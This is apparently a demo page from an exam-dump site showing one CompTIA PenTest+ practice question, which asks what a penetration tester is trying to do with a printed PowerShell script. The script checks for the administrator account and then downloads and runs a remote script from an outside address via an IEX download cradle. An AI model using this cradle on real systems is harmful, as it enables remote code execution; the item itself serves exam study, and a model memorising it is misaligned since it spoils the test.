PT0-003 Web TestEngine demo

Exit VCEDump PT0-003 CompTIA PenTest+
Question 59 of 71
0% complete
Q59 Single choice

Given the following script:

$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1]
If ($1 -eq "administrator") {
echo IEX(New-Object Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1') |
powershell - noprofile -}

Which of the following is the penetration tester most likely trying to do?

Sign in to mark questions

Sign in to save marked questions and return to this demo.

Sign in